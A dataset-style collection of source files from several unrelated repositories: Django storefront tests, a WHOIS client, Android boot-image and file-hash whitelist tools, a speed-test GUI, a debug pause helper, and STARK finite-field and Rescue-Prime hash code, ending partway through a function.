metadata (dict) | text (string, 60 to 3.49M chars) |
---|---|
{
"source": "3etechinns/saleor",
"score": 3
} |
#### File: saleor/tests/test_collection.py
```python
from django.urls import reverse
from .utils import get_redirect_location
def test_collection_index(client, collection):
url_kwargs = {'pk': collection.id, 'slug': collection.slug}
url = reverse('product:collection', kwargs=url_kwargs)
response = client.get(url)
assert response.status_code == 200
def test_collection_incorrect_slug(client, collection):
"""When entered on the collection with proper PK but incorrect slug,
one should be permanently(301) redirected to the proper url.
"""
url_kwargs = {'pk': collection.id, 'slug': 'incorrect-slug'}
url = reverse('product:collection', kwargs=url_kwargs)
response = client.get(url)
# User should be redirected to the proper url
assert response.status_code == 301
redirected_url = get_redirect_location(response)
proper_kwargs = {'pk': collection.id, 'slug': collection.slug}
proper_url = reverse('product:collection', kwargs=proper_kwargs)
assert redirected_url == proper_url
def test_collection_not_exists(client):
url_kwargs = {'pk': 123456, 'slug': 'incorrect-slug'}
url = reverse('product:collection', kwargs=url_kwargs)
response = client.get(url)
assert response.status_code == 404
``` |
{
"source": "3ev0/dns-monitor",
"score": 2
} |
#### File: dns-monitor/dnsmon/whois.py
```python
__author__ = '3ev0'
"""
Whois library.
See RFC 3912
https://www.icann.org/resources/pages/approved-with-specs-2013-09-17-en#whois
We parse the key/value pairs as-is and do not try to normalize them to a uniform format. This should be good enough.
How to deal with domain intermediaries? This is, afaik, limited to .com, .edu and .net domains.
For these domains we do a second referral to get the more detailed whois data.
"""
import re
import logging
import socket
import threading
import datetime
import time
from . import libnet
_log = logging.getLogger(__name__)
_lock = threading.Lock()
_auth_wserver_cache = {}
_whois_root = "whois.iana.org"
_last_queried = {}
_last_queried_lock = threading.RLock()
_config = {"min_query_interval": 0.5}
def configure(**kwargs):
_config.update(kwargs)
_log.info("Module configured: %s", _config)
def repr_records(whoisdata):
lines = []
for record in whoisdata:
for k in sorted(record):
values = record[k].split("\n")
for val in values:
lines.append("{}: {}".format(k, val))
lines.append("")
return "\n".join(lines)
def domain_lookup(domain, wserver=None, raw=False):
if not libnet.is_domain(domain):
raise ValueError("%s is not a valid domain", domain)
if len(domain.strip(".").split(".")) is 1:
tld = domain.split(".")[-1]
whoisdata = _talk_whois(_whois_root, "."+tld)
else:
if not wserver:
wserver = _get_auth_wserver_domain(domain)
whoisdata = _talk_whois(wserver, domain)
if raw:
return whoisdata
else:
return _parse_whois_response(whoisdata)
def lookup(querystr, wserver=None, raw=False):
if libnet.is_domain(querystr):
return domain_lookup(querystr, wserver, raw)
elif libnet.is_ipaddr(querystr):
return ip_lookup(querystr, wserver, raw)
elif libnet.is_asnum(querystr):
return ip_lookup(querystr, wserver, raw)
else:
raise ValueError("%s should be a domain, ip or asnum" % querystr)
def ip_lookup(querystr, wserver=None, raw=False):
if not libnet.is_ipaddr(querystr) and not libnet.is_asnum(querystr):
raise ValueError("%s is not a valid IP-address or ASnum", querystr)
if not wserver:
wserver = _get_auth_wserver(querystr)
if wserver == "whois.arin.net": # ofcourse, the yanks need some special switches
querystr = "+ " + querystr
elif wserver == "whois.ripe.net": # no special query needed
pass
elif wserver == "whois.apnic.net": # no special query needed
pass
elif wserver == "whois.afrinic.net": # no special query needed
pass
elif wserver == "whois.lacnic.net": # no special query needed
pass
if raw:
return _talk_whois(wserver, querystr)
else:
return _parse_whois_response(_talk_whois(wserver, querystr))
def _parse_whois_response(response):
"""
Dealing with the many different interpretations of the whois response format.
If an empty line is encountered, start a new record
If a line with a colon is encountered, treat everything before the first : as key and start a value
If a line without a colon is encountered when a value is started, add it to the current value.
If a line without a colon is encountered before a value is started, skip it.
:param response: the raw response to parse
:return: a list of records, each a dict mapping keys to (newline-joined) values
"""
newkvre = re.compile(r"^(\s*)([^\>\%\s][^:]+):(\s*(.*))?$")
commre = re.compile(r"^\s*[\%\>\@\;].*$")
records = []
currecord, curkey = {}, None
comment = False
for line in response.splitlines():
if line.strip() == "":
comment = False
if len(currecord):
records.append(currecord)
currecord, curkey = {}, None
continue
if comment:
continue
match = newkvre.match(line)
matchcomm = commre.match(line)
if match and matchcomm is None:
curkey = match.group(2)
val = match.group(4) if match.group(4) else ""
if curkey in currecord:
currecord[curkey] += "\n" + val
else:
currecord[curkey] = val
elif matchcomm: # part of comments
comment = True
continue
elif match is None and curkey: # this is likely part of multiline value
currecord[curkey] += "\n" + line.strip()
else:
comment = True
continue # this is likely start of comments
if len(currecord):
records.append(currecord)
_log.debug("Response parsed succesfully. %d records", len(records))
return records
def _talk_whois(wserver, querystr):
_delay(wserver)
sock = socket.create_connection((wserver, 43))
_log.debug("Connected to %s", wserver)
queryblob = bytes(querystr + "\r\n", encoding="utf8", errors="replace")
msglen = len(queryblob)
totalsent = 0
while totalsent < msglen:
sent = sock.send(queryblob[totalsent:])
totalsent += sent
_log.debug("Request sent: %s", querystr)
chunks = []
chunk = sock.recv(4096)
chunks.append(chunk)
while len(chunk) > 0:
chunk = sock.recv(4096)
chunks.append(chunk)
response = str(b"".join(chunks), encoding="utf8", errors="replace")
_log.debug("Response received:\n%s", response)
return response
def _get_cached_wserver(key):
with _lock:
wserver = _auth_wserver_cache.get(key, None)
if wserver:
_log.debug("Cache hit on %s: %s", key, wserver)
else:
_log.debug("Cache miss on %s", key)
return wserver
def _cache_wserver(domain, wserver):
with _lock:
_auth_wserver_cache[domain] = wserver
def _get_auth_wserver_domain(domain):
"""
Return the authoritative whois server for the domain. It queries the global iana whois server and finds the referral
whois server for the TLD of this domain.
:param domain: The domain for which the whois server should be found
:return: the domain name of the whois server for this domain
"""
tld = domain.split(".")[-1]
_log.debug("looking up authorative wserver for %s (tld: %s)", domain, tld)
auth_wserver = _get_cached_wserver(tld)
if not auth_wserver:
respdata = _parse_whois_response(_talk_whois(_whois_root, "."+tld))
for record in respdata:
if "whois" in record:
auth_wserver = record["whois"]
_cache_wserver(tld, auth_wserver)
break
if not auth_wserver:
_log.error("Could not determine auth whois server for %s", domain)
raise Exception("Could not determine auth whois server for {}".format(domain))
# Special case. There is a second-tier authoritative server for .com, .edu and .net
if auth_wserver == "whois.verisign-grs.com":
_log.debug("Looking up intermediary authorative wserver for %s", domain)
respdata = _parse_whois_response(_talk_whois(auth_wserver, "=" + domain))
for record in respdata:
if "Domain Name" in record:
auth_wserver = record["Whois Server"]
break
_log.debug("Found authorative whois server: %s", auth_wserver)
return auth_wserver
def _get_auth_wserver(querystr):
"""
Return the authoritative whois server for this request. It queries the global iana whois server and finds the referral
whois server for the query.
:param querystr: The IP or ASnum for which the whois server should be found
:return: the address of the whois server for this query string
"""
_log.debug("looking up authorative wserver for %s", querystr)
auth_wserver = _get_cached_wserver(querystr)
if auth_wserver:
return auth_wserver
respdata = _parse_whois_response(_talk_whois(_whois_root, querystr))
try:
auth_wserver = respdata[0]["refer"]
except (KeyError, IndexError) as e:
auth_wserver = None
if not auth_wserver:
_log.error("Could not determine auth whois server for %s", querystr)
raise Exception("Could not determine auth whois server for {}".format(querystr))
_cache_wserver(querystr, auth_wserver)
_log.debug("Found authorative whois server: %s", auth_wserver)
return auth_wserver
def _delay(wserver):
"""
This forces threads to delay a preconfigured interval before querying the specified whois server again.
The thread that holds the wserver lock does not release it until at least the configured interval has passed since the last release.
:param wserver: The wserver for which the thread should delay
:return:
"""
with _last_queried_lock:
if wserver not in _last_queried:
_last_queried[wserver] = [threading.RLock(), 0]
with _last_queried[wserver][0]:
interval = datetime.datetime.now().timestamp() - _last_queried[wserver][1]
sleep_time = _config["min_query_interval"] - interval
if sleep_time > 0:
_log.debug("%s Delaying to query %s: %f seconds...", threading.current_thread().name, wserver, sleep_time)
time.sleep(sleep_time)
_last_queried[wserver][1] = datetime.datetime.now().timestamp()
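# Example usage (illustrative, not part of the original module):
#   configure(min_query_interval=1.0)
#   records = lookup("example.com")
#   print(repr_records(records))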
``` |
{
"source": "3ev0/toolshed",
"score": 3
} |
#### File: toolshed/android/bootimg.py
```python
__author__ = 'ivo'
import struct
import io
import logging
import gzip
import subprocess
import os.path
import os
import tempfile
_log = logging.getLogger(__name__)
class BootImgHeader():
_struct = "<8sIIIIIIII4x4x16s512s32s1024s"
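# Field layout follows the AOSP boot image header: magic, kernel/ramdisk/second
# sizes and load addresses, tags_addr, page_size, two skipped words (4x4x),
# board name, kernel cmdline, image id, extra cmdline.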
structlen = struct.calcsize(_struct)
@classmethod
def fromBytes(cls, blob):
bih = cls()
(bih.magic, bih.kernel_size, bih.kernel_addr,
bih.ramdisk_size, bih.ramdisk_addr, bih.second_size,
bih.second_addr, bih.tags_addr, bih.page_size,
bih.name, bih.cmdline, bih.id, bih.extra_cmdline) = struct.unpack_from(cls._struct, blob)
return bih
@classmethod
def fromFile(cls, fh):
return cls.fromBytes(fh.read(cls.structlen))
def __repr__(self):
return "<{}({})>".format(self.__class__.__name__, vars(self))
def _extract_kernel(fh):
hdr = BootImgHeader.fromFile(fh)
fh.seek(hdr.page_size - BootImgHeader.structlen, io.SEEK_CUR)
kernel_blob = fh.read(hdr.kernel_size)
return kernel_blob
def extract_kernel(fh):
if isinstance(fh, str):
with open(fh, "rb") as fh:
return _extract_kernel(fh)
else:
return _extract_kernel(fh)
def _extract_ramdisk(fh):
hdr = BootImgHeader.fromFile(fh)
fh.seek(hdr.page_size - BootImgHeader.structlen, io.SEEK_CUR)
fh.seek(hdr.kernel_size, io.SEEK_CUR)
# skip padding up to the next page boundary (no-op if kernel_size is page-aligned)
fh.seek((-hdr.kernel_size) % hdr.page_size, io.SEEK_CUR)
ramdisk_blob = fh.read(hdr.ramdisk_size)
return ramdisk_blob
def extract_ramdisk(fh):
if isinstance(fh, str):
with open(fh, "rb") as fh:
return _extract_ramdisk(fh)
else:
return _extract_ramdisk(fh)
def unpack_ramdisk(blob, destdir):
extractdir = os.path.join(destdir, "ramdisk_unpacked")
if not os.path.exists(extractdir):
os.mkdir(extractdir)
_log.info("Unpacking ramdisk to %s...", extractdir)
tfh = tempfile.TemporaryFile()
with gzip.open(io.BytesIO(blob), "rb") as gfh:
tfh.write(gfh.read())
tfh.seek(0)
subprocess.check_call(["cpio", "-i", "--no-absolute-filenames"], stdin=tfh, cwd=extractdir)
return extractdir
```
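A minimal usage sketch for the boot image helpers above; the import path and the `boot.img` filename are assumptions, not part of the repo:
```python
# Hypothetical usage; "boot.img" and the import path are assumed.
from android import bootimg

kernel = bootimg.extract_kernel("boot.img")    # accepts a path or an open binary file
ramdisk = bootimg.extract_ramdisk("boot.img")
print("kernel: %d bytes, ramdisk: %d bytes" % (len(kernel), len(ramdisk)))

# unpack_ramdisk expects a gzipped cpio blob and shells out to cpio(1)
extractdir = bootimg.unpack_ramdisk(ramdisk, "/tmp")
print("ramdisk unpacked to", extractdir)
```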
#### File: toolshed/android/build_whitelist.py
```python
import logging
import argparse
import os
import os.path
import subprocess
import hashlib
import json
import shutil
import stat
import plyvel
from android import filesystem
from android import simg2img
TRUST_LEVELS = {"high":2, # Known good source
"medium":1, # Source probably good, but not verified
"low":0} # Source trust unknown
THREAT_LEVELS = {"good":0,
"evil":1}
_log = logging.getLogger()
_tempdir = "/tmp"
_config = {"tempdir":"/tmp",
"dbpath": "hashes.db",
"dbif": None
}
def configure(**kwargs):
_config.update(**kwargs)
def _update_value(curval, value):
newval = {"filepath":value["filepath"],
"source_id":value["source_id"],
"threat":value["threat"],
"trust":value["trust"]
}
return newval
def batch_write(items, replace=True):
_log.debug("Batch write of %d items to %s", len(items), repr(_config["dbif"]))
num_added, num_procd, dupl = 0, 0, 0
with _config["dbif"].write_batch() as wb:
for hashes,value in items:
for hash in hashes:
num_procd += 1
curval = _config["dbif"].get(hash)
if curval:
_log.info("%s allready present in db", repr(hash))
dupl += 1
if not replace:
_log.info("not added")
continue
else:
newval = _update_value(json.loads(str(curval, encoding="utf8")), value)
wb.put(hash, bytes(json.dumps(newval), encoding="utf8"))
num_added += 1
_log.info("Replaced with %s", newval)
else:
wb.put(hash, bytes(json.dumps(value), encoding="utf8"))
_log.debug("%s added to database", repr(hash))
return num_added, num_procd, dupl
def hash_file(filepath):
_log.debug("Hashing %s", filepath)
with open(filepath, mode="br") as fh:
mmd5 = hashlib.md5()
msha1 = hashlib.sha1()
msha256 = hashlib.sha256()
blob = fh.read(1024*1024)
while blob:
mmd5.update(blob)
msha1.update(blob)
msha256.update(blob)
blob = fh.read(1024*1024)
return mmd5.digest(), msha1.digest(), msha256.digest()
def explore_filesystem(rootpath, sourceid=None, threat=None, trust=None):
dbif = _config["dbif"]
_log.info("Exploring from root %s...", rootpath)
batch_size = 1024
batch = []
total_added, total_procd, total_dupl = 0, 0, 0
for (root, dirs, files) in os.walk(rootpath, followlinks=False):
for fl in files:
fp = os.path.join(root, fl)
_log.info("Encountered file %s", fp)
if stat.S_ISLNK(os.lstat(fp).st_mode):
_log.info("Is symlink, so skipped")
continue
hashes = hash_file(fp)
batch.append((hashes, {"source_id": sourceid,
"threat":threat,
"trust":trust,
"filepath":fp}))
if len(batch) >= batch_size:
added, procd, dupl = batch_write(batch)
total_added, total_procd, total_dupl = total_added + added, total_procd + procd, total_dupl + dupl
batch = []
added, procd, dupl = batch_write(batch)
total_added, total_procd, total_dupl = total_added + added, total_procd + procd, total_dupl + dupl
_log.info("Done exploring!")
_log.info("%d records processed", total_procd)
_log.info("%d records allready in db", total_dupl)
dbif.close()
def main():
parser = argparse.ArgumentParser(description="Build hash list from images files or dirs")
parser.add_argument("source", help="Image file or dir")
parser.add_argument("-i", "--id", default="unknown", help="Provide source identifier to be stored with the hashes")
parser.add_argument("-t", "--threat", default="good", choices=list(THREAT_LEVELS.keys()), help="The threat level of these files")
parser.add_argument("-r", "--trust", default="high", choices=list(TRUST_LEVELS.keys()), help="The trust level of these files")
parser.add_argument("-d", "--debug", action="store_true", help="Enable debugging")
parser.add_argument("-o", "--output", default="hashes.db", help="The output database. If existing, the data is added. Default: hashes.db")
parser.add_argument("-f", "--format", choices=["ldb", "sql"], default="ldb", help="The output format. Default: ldb")
args = parser.parse_args()
logging.basicConfig(level=logging.DEBUG if args.debug else logging.INFO)
global _log
_config["dbpath"] = args.output
dbcreated = False
if args.format == "ldb":
if not os.path.exists(_config["dbpath"]):
dbcreated = True
_config["dbif"] = plyvel.DB(_config["dbpath"], create_if_missing=True)
_log.info("Connected to Ldb database %s", repr(_config["dbif"]))
else:
raise Exception("db format not implemented")
source = os.path.abspath(args.source)
_log.info("New source: %s...", source)
tempdir, mounted = False, False
if not os.path.exists(source):
_log.error("Path does not exist")
raise SystemExit(1)
if os.path.isfile(source):
if filesystem.is_sparseext4(source):
_log.info("Smells like sparse ext4 image")
curfp = source
source = os.path.join(os.path.dirname(source), "unsparsed." + os.path.basename(source))
with open(curfp, "rb") as infd, open(source, "wb") as outfd:
simg2img.unsparse(infd, outfd)
if filesystem.is_yaffs_image(source):
_log.info("Smells like yaffs image")
rootpath = filesystem.unpack_yaffs(source)
else:
_log.info("Doesn't smell familier, i'll try to mount")
rootpath = filesystem.mount_image(source)
mounted = True
tempdir = True
else:
_log.info("assuming this the root of file tree")
rootpath = source
explore_filesystem(rootpath, sourceid=args.id, threat=args.threat, trust=args.trust)
# In case this script is run as sudo because of mounting, we want to change the owner to actual user
if os.environ["SUDO_USER"] and dbcreated:
subprocess.check_call(["chown", "-R", "{}:{}".format(os.environ["SUDO_UID"], os.environ["SUDO_GID"]), _config["dbpath"]])
_log.info("Owner of %s set to %s:%s", _config["dbpath"],os.environ["SUDO_UID"], os.environ["SUDO_GID"])
if mounted:
filesystem.unmount_image(rootpath)
if tempdir:
shutil.rmtree(rootpath)
_log.info("Temp dir %s deleted", rootpath)
if __name__ == "__main__":
main()
``` |
{
"source": "3eyedraven/SpeedO",
"score": 3
} |
#### File: 3eyedraven/SpeedO/speedO.py
```python
from tkinter import *
from speedtest import Speedtest
root = Tk()
root.title("SpeedO by threeeyedraven")
root.geometry('380x400')
root.resizable(False, False)
bg_image = PhotoImage(file='./speed.png')
bg_label = Label(image=bg_image)
bg_label.grid(row=0, column=0, padx=100, pady=5)
def get_speed():
s = Speedtest()
download = s.download()
upload = s.upload()
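# speedtest reports raw bits per second; divide by 10**6 for Mbps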
download_speed = round(download / (10 ** 6), 2)
upload_speed = round(upload / (10 ** 6), 2)
down_lab.config(text='Download speed is: ' + str(download_speed) + " Mbps")
upload_lab.config(text='Upload speed is: ' + str(upload_speed) + " Mbps")
fg = '#0cc6a9'
bg = '#ed4947'
Button(root, text='Get Speed', font=('Arial', 10, 'bold'), command=get_speed, bg=bg).grid(row=1, column=0, padx=5,
pady=10)
down_lab = Label(root, text='', fg=fg, font=('Helvetica', 10, 'bold'))
down_lab.grid(row=2, column=0, padx=5, pady=5)
upload_lab = Label(root, text='', fg=fg, font=('Helvetica', 10, 'bold'))
upload_lab.grid(row=3, column=0, padx=5, pady=5)
root.mainloop()
``` |
{
"source": "3fon3fonov/python",
"score": 3
} |
#### File: 3fon3fonov/python/pause.py
```python
from __future__ import print_function
__author__ = '<NAME>'
__version__ = '2018-08-30'
import inspect
import pdb
import sys
import termios
def getch():
"""
Read immediately a character without enter.
Example
-------
>>> print('char:', end=''); ch = getch(); print('nextline')
"""
old_settings = termios.tcgetattr(0)
new_settings = old_settings[:]
new_settings[3] &= ~termios.ICANON #& ~termios.ECHO
try:
termios.tcsetattr(0, termios.TCSANOW, new_settings)
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(0, termios.TCSANOW, old_settings)
return ch
def pause(*args, **kwargs):
"""
Set a pause at the current location in the script.
Pause waits for a character. If the character is a 'd' (debug), 's' (step)
or 'n' (next), it enters python debug mode.
If it is a 'q', it quits the program. An enter or any other characters
continues.
Parameters
----------
args : optional
Arguments to print.
ch : optional
A character can be passed, otherwise it prompts for it.
depth : optional
Stack level where to pause (default=0).
Example
-------
>>> from pause import pause
>>> def func_a():
... a = 2
... pause()
... b = 3
... pause()
>>>
>>> func_a()
"""
#lineno = inspect.currentframe().f_back.f_lineno
depth = 1 + kwargs.get('depth', 0) # we want to stop in the caller
prompt = kwargs.get('prompt', 'pause')
_, filename, lineno, _,_,_ = inspect.stack()[depth]
print(prompt, filename, 'line %s: ' % lineno, *args, end='')
sys.stdout.flush()
ch = kwargs.get('ch')
if not ch:
ch = getch() # all shells?
#ch = sys.stdin.readline() # requires manual enter
#ch = os.popen('read -s -n 1 -p "'+prompt+'" ch; echo $ch').read() # only bash?
#print ch.rstrip() # print single char (and remove newline)
if ch != '\n':
print()
if ch == 'q':
exit()
elif ch in ('d', 'n', 's'):
print("debug mode; type 'c' to continue")
if 1:
# a workaround for bad arrow keys and history behaviour
print('mode d: logging turned off, stdout reset')
sys.stdout = sys.__stdout__
x = pdb.Pdb(skip=['pause'])
#x.prompt = 'Bla '
# x.rcLines=["print 'aa'"]; x.setup(sys._getframe().f_back,None)
# x.set_trace(sys._getframe().f_back) # debug
x.set_trace(sys._getframe(depth)) # debug
return ch
def stop(*args):
pause(*args, prompt='stop', ch='d', depth=1)
``` |
{
"source": "3for/stark-anatomy",
"score": 3
} |
#### File: stark-anatomy/code/algebra.py
```python
def xgcd( x, y ):
old_r, r = (x, y)
old_s, s = (1, 0)
old_t, t = (0, 1)
while r != 0:
quotient = old_r // r
old_r, r = (r, old_r - quotient * r)
old_s, s = (s, old_s - quotient * s)
old_t, t = (t, old_t - quotient * t)
return old_s, old_t, old_r # a, b, g
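# e.g. xgcd(3, 7) == (-2, 1, 1) since -2*3 + 1*7 == 1 == gcd(3, 7)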
class FieldElement:
def __init__( self, value, field ):
self.value = value
self.field = field
def __add__( self, right ):
return self.field.add(self, right)
def __mul__( self, right ):
return self.field.multiply(self, right)
def __sub__( self, right ):
return self.field.subtract(self, right)
def __truediv__( self, right ):
return self.field.divide(self, right)
def __neg__( self ):
return self.field.negate(self)
def inverse( self ):
return self.field.inverse(self)
# modular exponentiation -- be sure to encapsulate in parentheses!
def __xor__( self, exponent ):
acc = FieldElement(1, self.field)
val = FieldElement(self.value, self.field)
for i in reversed(range(len(bin(exponent)[2:]))):
acc = acc * acc
if (1 << i) & exponent != 0:
acc = acc * val
return acc
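# note: * binds tighter than ^ in Python, so x^3 * y parses as x^(3 * y);
# always write (x^3) * y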
def __eq__( self, other ):
return self.value == other.value
def __ne__( self, other ):
return self.value != other.value
def __str__( self ):
return str(self.value)
def __bytes__( self ):
return bytes(str(self).encode())
def is_zero( self ):
if self.value == 0:
return True
else:
return False
class Field:
def __init__( self, p ):
self.p = p
def zero( self ):
return FieldElement(0, self)
def one( self ):
return FieldElement(1, self)
def multiply( self, left, right ):
return FieldElement((left.value * right.value) % self.p, self)
def add( self, left, right ):
return FieldElement((left.value + right.value) % self.p, self)
def subtract( self, left, right ):
return FieldElement((self.p + left.value - right.value) % self.p, self)
def negate( self, operand ):
return FieldElement((self.p - operand.value) % self.p, self)
def inverse( self, operand ):
a, b, g = xgcd(operand.value, self.p)
return FieldElement(((a % self.p) + self.p) % self.p, self)
def divide( self, left, right ):
assert(not right.is_zero()), "divide by zero"
a, b, g = xgcd(right.value, self.p)
return FieldElement(left.value * a % self.p, self)
def main():
p = 1 + 407 * ( 1 << 119 ) # 1 + 11 * 37 * 2^119
return Field(p)
def generator( self ):
assert(self.p == 1 + 407 * ( 1 << 119 )), "Do not know generator for other fields beyond 1+407*2^119"
return FieldElement(85408008396924667383611388730472331217, self)
def primitive_nth_root( self, n ):
if self.p == 1 + 407 * ( 1 << 119 ):
assert(n <= 1 << 119 and (n & (n-1)) == 0), "Field does not have nth root of unity where n > 2^119 or not power of two."
root = FieldElement(85408008396924667383611388730472331217, self)
order = 1 << 119
while order != n:
root = root^2
order = order // 2
return root
else:
assert(False), "Unknown field, can't return root of unity."
def sample( self, byte_array ):
acc = 0
for b in byte_array:
acc = (acc << 8) ^ int(b)
return FieldElement(acc % self.p, self)
```
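A short usage sketch (an illustration, not part of the repo) exercising the field API above; it assumes the definitions are importable from `algebra`:
```python
from algebra import Field, FieldElement

field = Field.main()
a = FieldElement(5, field)
b = FieldElement(12, field)
assert a * b == FieldElement(60, field)
assert (a / b) * b == a                   # division goes through the xgcd-based inverse
assert a * a.inverse() == field.one()
omega = field.primitive_nth_root(1 << 10)
assert omega^(1 << 10) == field.one()     # parenthesize: ^ binds looser than *
```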
#### File: stark-anatomy/code/rescue_prime.py
```python
from algebra import *
from univariate import *
from multivariate import *
class RescuePrime:
def __init__( self ):
self.p = 407 * (1 << 119) + 1
self.field = Field(self.p)
self.m = 2
self.rate = 1
self.capacity = 1
self.N = 27
self.alpha = 3
self.alphainv = 180331931428153586757283157844700080811
self.MDS = [[FieldElement(v, self.field) for v in [270497897142230380135924736767050121214, 4]],
[FieldElement(v, self.field) for v in [270497897142230380135924736767050121205, 13]]]
self.MDSinv = [[FieldElement(v, self.field) for v in [210387253332845851216830350818816760948, 60110643809384528919094385948233360270]],
[FieldElement(v, self.field) for v in [90165965714076793378641578922350040407, 180331931428153586757283157844700080811]]]
self.round_constants = [FieldElement(v, self.field) for v in [174420698556543096520990950387834928928,
109797589356993153279775383318666383471,
228209559001143551442223248324541026000,
268065703411175077628483247596226793933,
250145786294793103303712876509736552288,
154077925986488943960463842753819802236,
204351119916823989032262966063401835731,
57645879694647124999765652767459586992,
102595110702094480597072290517349480965,
8547439040206095323896524760274454544,
50572190394727023982626065566525285390,
87212354645973284136664042673979287772,
64194686442324278631544434661927384193,
23568247650578792137833165499572533289,
264007385962234849237916966106429729444,
227358300354534643391164539784212796168,
179708233992972292788270914486717436725,
102544935062767739638603684272741145148,
65916940568893052493361867756647855734,
144640159807528060664543800548526463356,
58854991566939066418297427463486407598,
144030533171309201969715569323510469388,
264508722432906572066373216583268225708,
22822825100935314666408731317941213728,
33847779135505989201180138242500409760,
146019284593100673590036640208621384175,
51518045467620803302456472369449375741,
73980612169525564135758195254813968438,
31385101081646507577789564023348734881,
270440021758749482599657914695597186347,
185230877992845332344172234234093900282,
210581925261995303483700331833844461519,
233206235520000865382510460029939548462,
178264060478215643105832556466392228683,
69838834175855952450551936238929375468,
75130152423898813192534713014890860884,
59548275327570508231574439445023390415,
43940979610564284967906719248029560342,
95698099945510403318638730212513975543,
77477281413246683919638580088082585351,
206782304337497407273753387483545866988,
141354674678885463410629926929791411677,
19199940390616847185791261689448703536,
177613618019817222931832611307175416361,
267907751104005095811361156810067173120,
33296937002574626161968730356414562829,
63869971087730263431297345514089710163,
200481282361858638356211874793723910968,
69328322389827264175963301685224506573,
239701591437699235962505536113880102063,
17960711445525398132996203513667829940,
219475635972825920849300179026969104558,
230038611061931950901316413728344422823,
149446814906994196814403811767389273580,
25535582028106779796087284957910475912,
93289417880348777872263904150910422367,
4779480286211196984451238384230810357,
208762241641328369347598009494500117007,
34228805619823025763071411313049761059,
158261639460060679368122984607245246072,
65048656051037025727800046057154042857,
134082885477766198947293095565706395050,
23967684755547703714152865513907888630,
8509910504689758897218307536423349149,
232305018091414643115319608123377855094,
170072389454430682177687789261779760420,
62135161769871915508973643543011377095,
15206455074148527786017895403501783555,
201789266626211748844060539344508876901,
179184798347291033565902633932801007181,
9615415305648972863990712807943643216,
95833504353120759807903032286346974132,
181975981662825791627439958531194157276,
267590267548392311337348990085222348350,
49899900194200760923895805362651210299,
89154519171560176870922732825690870368,
265649728290587561988835145059696796797,
140583850659111280842212115981043548773,
266613908274746297875734026718148328473,
236645120614796645424209995934912005038,
265994065390091692951198742962775551587,
59082836245981276360468435361137847418,
26520064393601763202002257967586372271,
108781692876845940775123575518154991932,
138658034947980464912436420092172339656,
45127926643030464660360100330441456786,
210648707238405606524318597107528368459,
42375307814689058540930810881506327698,
237653383836912953043082350232373669114,
236638771475482562810484106048928039069,
168366677297979943348866069441526047857,
195301262267610361172900534545341678525,
2123819604855435621395010720102555908,
96986567016099155020743003059932893278,
248057324456138589201107100302767574618,
198550227406618432920989444844179399959,
177812676254201468976352471992022853250,
211374136170376198628213577084029234846,
105785712445518775732830634260671010540,
122179368175793934687780753063673096166,
126848216361173160497844444214866193172,
22264167580742653700039698161547403113,
234275908658634858929918842923795514466,
189409811294589697028796856023159619258,
75017033107075630953974011872571911999,
144945344860351075586575129489570116296,
261991152616933455169437121254310265934,
18450316039330448878816627264054416127]]
def hash( self, input_element ):
# absorb
state = [input_element] + [self.field.zero()] * (self.m - 1)
# permutation
for r in range(self.N):
# forward half-round
# S-box
for i in range(self.m):
state[i] = state[i]^self.alpha
# matrix
temp = [self.field.zero() for i in range(self.m)]
for i in range(self.m):
for j in range(self.m):
temp[i] = temp[i] + self.MDS[i][j] * state[j]
# constants
state = [temp[i] + self.round_constants[2*r*self.m+i] for i in range(self.m)]
# backward half-round
# S-box
for i in range(self.m):
state[i] = state[i]^self.alphainv
# matrix
temp = [self.field.zero() for i in range(self.m)]
for i in range(self.m):
for j in range(self.m):
temp[i] = temp[i] + self.MDS[i][j] * state[j]
# constants
state = [temp[i] + self.round_constants[2*r*self.m+self.m+i] for i in range(self.m)]
# squeeze
return state[0]
def trace( self, input_element ):
trace = []
# absorb
state = [input_element] + [self.field.zero()] * (self.m - 1)
# explicit copy to record state into trace
trace += [[s for s in state]]
# permutation
for r in range(self.N):
# forward half-round
# S-box
for i in range(self.m):
state[i] = state[i]^self.alpha
# matrix
temp = [self.field.zero() for i in range(self.m)]
for i in range(self.m):
for j in range(self.m):
temp[i] = temp[i] + self.MDS[i][j] * state[j]
# constants
state = [temp[i] + self.round_constants[2*r*self.m+i] for i in range(self.m)]
# backward half-round
# S-box
for i in range(self.m):
state[i] = state[i]^self.alphainv
# matrix
temp = [self.field.zero() for i in range(self.m)]
for i in range(self.m):
for j in range(self.m):
temp[i] = temp[i] + self.MDS[i][j] * state[j]
# constants
state = [temp[i] + self.round_constants[2*r*self.m+self.m+i] for i in range(self.m)]
# record state at this point, with explicit copy
trace += [[s for s in state]]
# squeeze
# output = state[0]
return trace
def boundary_constraints( self, output_element ):
constraints = []
# at start, capacity is zero
constraints += [(0, 1, self.field.zero())]
# at end, rate part is the given output element
constraints += [(self.N, 0, output_element)]
return constraints
def round_constants_polynomials( self, omicron ):
first_step_constants = []
for i in range(self.m):
domain = [omicron^r for r in range(0, self.N)]
values = [self.round_constants[2*r*self.m+i] for r in range(0, self.N)]
univariate = Polynomial.interpolate_domain(domain, values)
multivariate = MPolynomial.lift(univariate, 0)
first_step_constants += [multivariate]
second_step_constants = []
for i in range(self.m):
domain = [omicron^r for r in range(0, self.N)]
values = [self.field.zero()] * self.N
#for r in range(self.N):
# print("len(round_constants):", len(self.round_constants), " but grabbing index:", 2*r*self.m+self.m+i, "for r=", r, "for m=", self.m, "for i=", i)
# values[r] = self.round_constants[2*r*self.m + self.m + i]
values = [self.round_constants[2*r*self.m+self.m+i] for r in range(self.N)]
univariate = Polynomial.interpolate_domain(domain, values)
multivariate = MPolynomial.lift(univariate, 0)
second_step_constants += [multivariate]
return first_step_constants, second_step_constants
def transition_constraints( self, omicron ):
# get polynomials that interpolate through the round constants
first_step_constants, second_step_constants = self.round_constants_polynomials(omicron)
# arithmetize one round of Rescue-Prime
variables = MPolynomial.variables(1 + 2*self.m, self.field)
cycle_index = variables[0]
previous_state = variables[1:(1+self.m)]
next_state = variables[(1+self.m):(1+2*self.m)]
air = []
for i in range(self.m):
# compute left hand side symbolically
# lhs = sum(MPolynomial.constant(self.MDS[i][k]) * (previous_state[k]^self.alpha) for k in range(self.m)) + first_step_constants[i]
lhs = MPolynomial.constant(self.field.zero())
for k in range(self.m):
lhs = lhs + MPolynomial.constant(self.MDS[i][k]) * (previous_state[k]^self.alpha)
lhs = lhs + first_step_constants[i]
# compute right hand side symbolically
# rhs = sum(MPolynomial.constant(self.MDSinv[i][k]) * (next_state[k] - second_step_constants[k]) for k in range(self.m))^self.alpha
rhs = MPolynomial.constant(self.field.zero())
for k in range(self.m):
